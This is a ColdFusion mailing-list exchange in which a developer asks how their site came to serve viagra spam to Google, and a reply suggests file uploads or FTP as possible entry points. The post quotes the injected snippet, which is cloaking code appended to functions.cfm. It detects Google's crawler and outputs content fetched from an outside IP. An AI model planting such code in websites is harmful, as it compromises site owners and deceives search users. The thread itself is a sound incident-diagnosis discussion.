>Recently a site of ours got hacked - basically, a Google search the site 
>was returning viagra info!
>What we got was a small script added to the end of a functions.cfm file:
>
><cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) /><cfif (Find( 
>"google", REQUEST.UserAgent )) >
><cfhttp method="get" 
>url="http://168.16.228.250/fms/";><cfoutput>#cfhttp.filecontent#</cfoutput></cfif>
>
>I'm not the server admin for this site, so they're sorta pointing the 
>finger at us developers, and we're pointing fingers back at them about 
>lax server security. We've got a boatload of stuff on this site to 
>prevernt SQL injection, including Justin D. Scott's application script, 
>carefully checking anything to goes into the database, client and server 
>side form validation, blah, blah, blah...
>
>Anybody seen the above, and if so, thoughts? Anybody manage to determine 
>how the exploit happened to start with?


does the application have any cffile uploads?  do those uploads put the file 
into a url accessible directory?  ftp server hack wouldn't be unthinkable 
either.

but it sounds like good way to promote clicks :) 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:353148
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Reply via email to